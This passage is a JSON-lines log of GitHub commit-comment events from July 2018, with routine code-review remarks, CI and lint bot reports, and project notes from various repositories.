{"id":"7968302004","type":"CommitCommentEvent","actor":{"login":"Awzaw"},"repo":{"name":"Teamblocket/PCFly"},"payload":{"comment":{"id":29715079,"position":null,"line":null,"path":null,"commit_id":"cc4dc26ed5b2009bf11288b612aab34db6282877","created_at":"2018-07-16T01:40:28Z","updated_at":"2018-07-16T01:40:28Z","author_association":"NONE","body":">if($sender->hasPermission('fly.command') == false or $sender->isOp() == false){...\r\n\r\nIn English this reads:\r\n\r\n>If the sender does not have the permission 'fly.command' *OR* the sender is not Op, then no fly allowed. \r\n\r\nWhat you want is:\r\n\r\n>If the sender has the permission 'fly.command' *OR* the sender is Op, then fly allowed. "}},"created_at":"2018-07-16T01:40:28Z"}
{"id":"7968304166","type":"CommitCommentEvent","actor":{"login":"Larrymuters8"},"repo":{"name":"Larrymuters8/Samsung"},"payload":{"comment":{"id":29715081,"position":1,"line":1,"path":"README.md","commit_id":"e911af89f6d841b8d1d6808ea83e35e3a7140b7a","created_at":"2018-07-16T01:41:53Z","updated_at":"2018-07-16T01:41:53Z","author_association":"OWNER","body":"![gotomeeting 003](https://user-images.githubusercontent.com/41133200/42740604-7ca6e36c-886f-11e8-8cb2-3a1a2ca5c7f1.png)\r\n"}},"created_at":"2018-07-16T01:41:53Z"}
{"id":"7968307223","type":"CommitCommentEvent","actor":{"login":"LHWYIGE"},"repo":{"name":"LHWYIGE/hello-world"},"payload":{"comment":{"id":29715083,"position":null,"line":null,"path":null,"commit_id":"b780c249167bb298763d74aebead4fae9a178cc8","created_at":"2018-07-16T01:43:48Z","updated_at":"2018-07-16T01:43:48Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-16T01:43:48Z"}
{"id":"7968309705","type":"CommitCommentEvent","actor":{"login":"Artem-B"},"repo":{"name":"ZestyTechnology/zesty-docs"},"payload":{"comment":{"id":29715089,"position":5,"line":6,"path":"docs/nimble/tuning.rst","commit_id":"0bd2700d56dd6aceb464c7344aec78b52aae9a2a","created_at":"2018-07-16T01:45:23Z","updated_at":"2018-07-16T01:45:23Z","author_association":"NONE","body":"If 2700 is the correct number, then the numbers below should also be adjusted appropriately to make them consistent.\r\nI.e. if 1/16 microstepping requires 2700steps/mm then the same setup with 1/8 microstepping needs only half of that -> 2700/2=1350, not 1200.\r\n"}},"created_at":"2018-07-16T01:45:23Z"}
{"id":"7968313722","type":"CommitCommentEvent","actor":{"login":"shellc0de0x"},"repo":{"name":"shellc0de0x/electrum-uno"},"payload":{"comment":{"id":29715090,"position":null,"line":null,"path":null,"commit_id":"e2e2ce4d36d6c8cba8883f47ee1eeec10bf68775","created_at":"2018-07-16T01:48:06Z","updated_at":"2018-07-16T01:48:06Z","author_association":"OWNER","body":"Updated to newest icons"}},"created_at":"2018-07-16T01:48:06Z"}
{"id":"7968315204","type":"CommitCommentEvent","actor":{"login":"PikachuEXE"},"repo":{"name":"redis-store/redis-activesupport"},"payload":{"comment":{"id":29715092,"position":null,"line":null,"path":null,"commit_id":"4542073124ee4a5e03203cd9aaec641f641cd506","created_at":"2018-07-16T01:49:02Z","updated_at":"2018-07-16T01:49:02Z","author_association":"CONTRIBUTOR","body":"No tag and not released?"}},"created_at":"2018-07-16T01:49:02Z"}
{"id":"7968315564","type":"CommitCommentEvent","actor":{"login":"Glowstoner"},"repo":{"name":"FireBlade-Serv/FireAPI"},"payload":{"comment":{"id":29715093,"position":null,"line":null,"path":null,"commit_id":"7d5a85f095ac9636e22e6926b00c6e59fc4ffc6a","created_at":"2018-07-16T01:49:16Z","updated_at":"2018-07-16T01:49:16Z","author_association":"MEMBER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Encryption key not serializable.](https://trello.com/c/EEIceEdS/7-encryption-key-not-serializable)"}},"created_at":"2018-07-16T01:49:16Z"}
{"id":"7968316815","type":"CommitCommentEvent","actor":{"login":"minombreesjeff"},"repo":{"name":"minombreesjeff/darwin_env"},"payload":{"comment":{"id":29715095,"position":null,"line":null,"path":null,"commit_id":"7e9f6a407543db425ffa6124fe19d22853c44778","created_at":"2018-07-16T01:50:04Z","updated_at":"2018-07-16T01:50:04Z","author_association":"OWNER","body":"Collision 855.14~855.16"}},"created_at":"2018-07-16T01:50:04Z"}
{"id":"7968317734","type":"CommitCommentEvent","actor":{"login":"v1ta"},"repo":{"name":"life-scribe/SMSService"},"payload":{"comment":{"id":29715097,"position":null,"line":null,"path":null,"commit_id":"2751aab24b6266e3bc1410d492e65cb2df6be70c","created_at":"2018-07-16T01:50:38Z","updated_at":"2018-07-16T01:50:38Z","author_association":"CONTRIBUTOR","body":"https://github.com/life-scribe/SMSService/issues/1"}},"created_at":"2018-07-16T01:50:38Z"}
{"id":"7968319057","type":"CommitCommentEvent","actor":{"login":"andiyuliandi26"},"repo":{"name":"andiyuliandi26/karirlti"},"payload":{"comment":{"id":29715100,"position":null,"line":null,"path":null,"commit_id":"9fa02c3088b57c8bdb4c0c151132cfe4c7f89013","created_at":"2018-07-16T01:51:25Z","updated_at":"2018-07-16T01:51:25Z","author_association":"OWNER","body":"merge"}},"created_at":"2018-07-16T01:51:25Z"}
{"id":"7968319267","type":"CommitCommentEvent","actor":{"login":"ebussieres"},"repo":{"name":"PebbleTemplates/pebble"},"payload":{"comment":{"id":29715102,"position":2,"line":1,"path":"pebble/CHANGELOG.md","commit_id":"c2a74c3ca7593ec5d71b5dd75f7bcb7ea52142a7","created_at":"2018-07-16T01:51:33Z","updated_at":"2018-07-16T01:51:33Z","author_association":"MEMBER","body":"@cemo You can run [pebble-performance-tests](https://github.com/PebbleTemplates/pebble-performance-test) by yourself to see it. Not a big improvement but it's better than nothing. #348, #350, #357 for example"}},"created_at":"2018-07-16T01:51:33Z"}
{"id":"7968321862","type":"CommitCommentEvent","actor":{"login":"CrisAdam"},"repo":{"name":"iscumd/mdart"},"payload":{"comment":{"id":29715104,"position":null,"line":null,"path":null,"commit_id":"8c148c34f6765670602277c9a0468c05314b6fe6","created_at":"2018-07-16T01:53:12Z","updated_at":"2018-07-16T01:53:12Z","author_association":"COLLABORATOR","body":"will probably want the odometer as a ground truth for speed, IMU only gets acceleration & will drift"}},"created_at":"2018-07-16T01:53:12Z"}
{"id":"7968325230","type":"CommitCommentEvent","actor":{"login":"Destiny609"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29715106,"position":null,"line":null,"path":null,"commit_id":"0a8ef45d23c2ce809a6373e45cb403fe6d1964b7","created_at":"2018-07-16T01:55:22Z","updated_at":"2018-07-16T01:55:22Z","author_association":"CONTRIBUTOR","body":"@Etaglibash  sera que podrás mandarme un reporte de traducción así mismo como esta el código y en que versión esta tu juego?, buscare donde esta el error, para ver cuales cambios dejar."}},"created_at":"2018-07-16T01:55:22Z"}
{"id":"7968327807","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29715108,"position":null,"line":null,"path":null,"commit_id":"11df6b53510d8eb8505737544ea0f2cd570840c4","created_at":"2018-07-16T01:57:03Z","updated_at":"2018-07-16T01:57:03Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Планеты: сделать первичную генерацию планет (имя, размер, объект? (крутящийся шарик с рандомной текстурой), система-хозяин.](https://trello.com/c/VhpDS4WO/21-%D0%BF%D0%BB%D0%B0%D0%BD%D0%B5%D1%82%D1%8B-%D1%81%D0%B4%D0%B5%D0%BB%D0%B0%D1%82%D1%8C-%D0%BF%D0%B5%D1%80%D0%B2%D0%B8%D1%87%D0%BD%D1%83%D1%8E-%D0%B3%D0%B5%D0%BD%D0%B5%D1%80%D0%B0%D1%86%D0%B8%D1%8E-%D0%BF%D0%BB%D0%B0%D0%BD%D0%B5%D1%82-%D0%B8%D0%BC%D1%8F-%D1%80%D0%B0%D0%B7%D0%BC%D0%B5%D1%80-%D0%BE%D0%B1%D1%8A%D0%B5%D0%BA%D1%82-%D0%BA%D1%80%D1%83%D1%82%D1%8F%D1%89%D0%B8%D0%B9%D1%81%D1%8F-%D1%88%D0%B0%D1%80%D0%B8%D0%BA-%D1%81-%D1%80%D0%B0%D0%BD%D0%B4%D0%BE%D0%BC%D0%BD%D0%BE%D0%B9-%D1%82%D0%B5%D0%BA%D1%81%D1%82%D1%83%D1%80%D0%BE%D0%B9-%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B0-%D1%85%D0%BE%D0%B7%D1%8F%D0%B8%D0%BD)"}},"created_at":"2018-07-16T01:57:03Z"}
{"id":"7968327978","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29715109,"position":null,"line":null,"path":null,"commit_id":"11df6b53510d8eb8505737544ea0f2cd570840c4","created_at":"2018-07-16T01:57:10Z","updated_at":"2018-07-16T01:57:10Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Планеты: система создания планет посредством ScriptableObject'ов.](https://trello.com/c/3PqNHue8/29-%D0%BF%D0%BB%D0%B0%D0%BD%D0%B5%D1%82%D1%8B-%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B0-%D1%81%D0%BE%D0%B7%D0%B4%D0%B0%D0%BD%D0%B8%D1%8F-%D0%BF%D0%BB%D0%B0%D0%BD%D0%B5%D1%82-%D0%BF%D0%BE%D1%81%D1%80%D0%B5%D0%B4%D1%81%D1%82%D0%B2%D0%BE%D0%BC-scriptableobject%D0%BE%D0%B2)"}},"created_at":"2018-07-16T01:57:10Z"}
{"id":"7968331313","type":"CommitCommentEvent","actor":{"login":"tdewolff"},"repo":{"name":"tdewolff/minify"},"payload":{"comment":{"id":29715110,"position":null,"line":null,"path":null,"commit_id":"835afedd1a7d95549ad735ed1c5ba3d357e21674","created_at":"2018-07-16T01:59:16Z","updated_at":"2018-07-16T01:59:16Z","author_association":"OWNER","body":"Apparently https://github.com/css/csso/tree/master/test/fixture/compress just deletes them (see the bad declaration files), but not sure if we want to go that way."}},"created_at":"2018-07-16T01:59:16Z"}
{"id":"7968331968","type":"CommitCommentEvent","actor":{"login":"Pcactus"},"repo":{"name":"Pcactus/Hello-World"},"payload":{"comment":{"id":29715111,"position":null,"line":null,"path":null,"commit_id":"971e29b8004672b1bcf1ab0a7f8389883b666ec8","created_at":"2018-07-16T01:59:41Z","updated_at":"2018-07-16T01:59:41Z","author_association":"OWNER","body":"kc"}},"created_at":"2018-07-16T01:59:41Z"}
{"id":"7968332310","type":"CommitCommentEvent","actor":{"login":"andfomin"},"repo":{"name":"andfomin/NgProjectTemplate"},"payload":{"comment":{"id":29715115,"position":null,"line":null,"path":null,"commit_id":"2d3feac4ec1159cc763129f906739499ca5bfad4","created_at":"2018-07-16T01:59:55Z","updated_at":"2018-07-16T01:59:55Z","author_association":"OWNER","body":"Fixed bug #17 ."}},"created_at":"2018-07-16T01:59:55Z"}
{"id":"7969702131","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29718056,"position":150,"line":108,"path":"contracts/Remittance.sol","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-16T10:00:04Z","updated_at":"2018-07-16T10:00:04Z","author_association":"NONE","body":"If 2 instances of this contract are deployed, the same arguments will yield the same hash. Opening the door to potential rainbow attack.\r\nHow can you prevent that?"}},"created_at":"2018-07-16T10:00:04Z"}
{"id":"7969703782","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718066,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-16T10:00:21Z","updated_at":"2018-07-16T10:00:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T10:00:21Z"}
{"id":"7969705352","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29718069,"position":null,"line":null,"path":null,"commit_id":"ef865eebc8f4094a5ffc57a1965660d585ecc9cf","created_at":"2018-07-16T10:00:38Z","updated_at":"2018-07-16T10:00:38Z","author_association":"NONE","body":"eigen_HBIRE (mbadams5) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ef865eebc8f4094a5ffc57a1965660d585ecc9cf-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-16T10:00:38Z"}
{"id":"7969705956","type":"CommitCommentEvent","actor":{"login":"agushermansyah621"},"repo":{"name":"Gendjex/vb2"},"payload":{"comment":{"id":29718074,"position":null,"line":null,"path":null,"commit_id":"1fff71d1db03d89e944941936f89c6ea9c62af7d","created_at":"2018-07-16T10:00:46Z","updated_at":"2018-07-16T10:00:46Z","author_association":"NONE","body":"Putra"}},"created_at":"2018-07-16T10:00:46Z"}
{"id":"7969706870","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29718078,"position":36,"line":36,"path":"src/main/java/abc/Group.java","commit_id":"f8596df53361f60d6b4550f544a28280041684ab","created_at":"2018-07-16T10:00:57Z","updated_at":"2018-07-16T10:00:57Z","author_association":"COLLABORATOR","body":"inputLine"}},"created_at":"2018-07-16T10:00:57Z"}
{"id":"7969707228","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29718080,"position":133,"line":93,"path":"contracts/Remittance.sol","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-16T10:01:02Z","updated_at":"2018-07-16T10:01:02Z","author_association":"NONE","body":"So here you disclose the passwords but allow their reuse because you zero out `ethFunds`."}},"created_at":"2018-07-16T10:01:02Z"}
{"id":"7969708247","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"inbo/LSVI"},"payload":{"comment":{"id":29718082,"position":null,"line":null,"path":null,"commit_id":"863b00516adaf3edbe210ae3d794b5e64d0241c9","created_at":"2018-07-16T10:01:14Z","updated_at":"2018-07-16T10:01:14Z","author_association":"NONE","body":"[R/berekenLSVIbasis.R:264:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/berekenLSVIbasis.R#L264) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>        .data$Habitattype,   #en hier zouden extra gegevens uit Data_habitat moeten toegevoegd worden\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/combinerenVoorwaarden.R:31:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/combinerenVoorwaarden.R#L31) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen of Formule bestaat uit EN, OF, haakjes en VoorwaardeID's (en evt. andere tekens die logische berekening toelaten)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/deselecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/deselecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:96:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/invoercontroleData_soortenKenmerken.R#L96) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    Kenmerken <- Data_soortenKenmerken #naamsverandering is omdat code verplaatst is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:109:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/invoercontroleData_soortenKenmerken.R#L109) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande code mag weg zodra Gert deze Canonicalname toegevoegd heeft aan de databank\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:47:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/invoercontroleData_voorwaarden.R#L47) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #misschien best ook testen dat die indicator-criterium-combinatie in de databank voorkomt?  En of deze voor dat habitattype voorkomt, maar dat best verderop doen\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:48:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/invoercontroleData_voorwaarden.R#L48) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #Voorwaarde ook verplichten?  Anders wel testen of het ok is als het aanwezig is.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_aantal.R:116:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_aantal.R#L116) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>setMethod(           #bij deze methode nog rekening houden met eventuele dubbels in de soortenlijst!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:40:13:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_bedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:43:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_bedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:59:7:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_bedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:60:7:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_bedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:40:13:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_maxBedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:43:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_maxBedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:59:7:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_maxBedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:60:7:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_maxBedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:40:13:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_maxBedekkingExcl.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:43:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_maxBedekkingExcl.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:59:7:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_maxBedekkingExcl.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:60:7:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/s4_maxBedekkingExcl.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/selecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/selecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/zzz.R:31:13:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/zzz.R#L31) *warning:* **no visible binding for global variable 'ConnectiePool'**\n```r\n<U+200B>  poolClose(ConnectiePool)\n            ^~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:26:3:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/inst/tests/testthat/test_berekenLSVIbasis.R#L26) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:27:3:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/inst/tests/testthat/test_berekenLSVIbasis.R#L27) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:485:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/inst/tests/testthat/test_berekenLSVIbasis.R#L485) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen: \"Niet alle te evalueren soorten zijn opgenomen onder Data_soorten\\\\$Soort_Latijn, er wordt van uitgegaan dat de niet opgenomen soorten niet waargenomen zijn\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:486:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/inst/tests/testthat/test_berekenLSVIbasis.R#L486) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog extra tests toevoegen voor genera en habitatsubtypes als de ontwikkeling hiervoor op punt staat\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_s4_Aantal.R:189:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/inst/tests/testthat/test_s4_Aantal.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  #nog toevoegen als het opzoeken van soorten in subniveaus opgelost is: de aggregatie van bedekkingen gebeurt correct\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-16T10:01:14Z"}
{"id":"7969709930","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718084,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-16T10:01:34Z","updated_at":"2018-07-16T10:01:34Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment 